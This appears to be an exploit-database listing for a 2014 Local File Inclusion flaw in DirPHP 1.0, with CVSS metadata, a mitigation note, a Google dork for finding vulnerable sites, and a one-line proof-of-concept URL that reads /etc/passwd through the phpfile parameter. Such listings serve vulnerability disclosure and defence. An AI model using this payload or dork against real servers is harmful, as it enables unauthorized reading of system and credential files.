header-logo
Suggest Exploit
vendor:
DirPHP
by:
-Chosen-
8,8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: DirPHP
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: o:dirphp:dirphp:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: *nix
2014

DirPHP – version 1.0 Local File Inclusion

DirPHP - version 1.0 is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to gain access to sensitive files on the server.

Mitigation:

Upgrade to the latest version of DirPHP.
Source

Exploit-DB raw data:

# Exploit Title: DirPHP - version 1.0 Local File Inclusion
# Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart
Montgomery
# Date: 7/26/14
# Exploit Author: -Chosen-
# Contact: dark[dot]binary[dot]code@gmail.com
# Version: DirPHP - Version 1.0
# Tested on: *nix

PoC:

http://site.com/path/index.php?phpfile=/etc/passwd

Navigation

Suggest Exploit

Services By CQR